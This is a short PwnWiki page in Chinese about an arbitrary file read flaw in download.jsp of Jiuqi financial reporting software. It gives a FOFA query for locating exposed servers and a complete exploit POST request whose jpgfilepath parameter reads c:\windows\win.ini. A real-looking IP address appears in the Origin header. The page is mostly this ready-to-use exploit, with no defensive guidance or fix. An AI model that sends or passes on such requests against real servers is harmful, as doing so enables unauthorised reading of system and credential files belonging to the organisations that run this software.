久其財務報表 download.jsp 任意文件讀取漏洞

From PwnWiki
Revision as of 15:36, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "發送以下請求:")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(繁體)‎

FOFA

body="/netrep/"

漏洞利用

發送以下請求:

POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host: 
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.251.113.53:7002
Content-Type: application/x-www-form-urlencoded

jpgfilepath=c:\windows\win.ini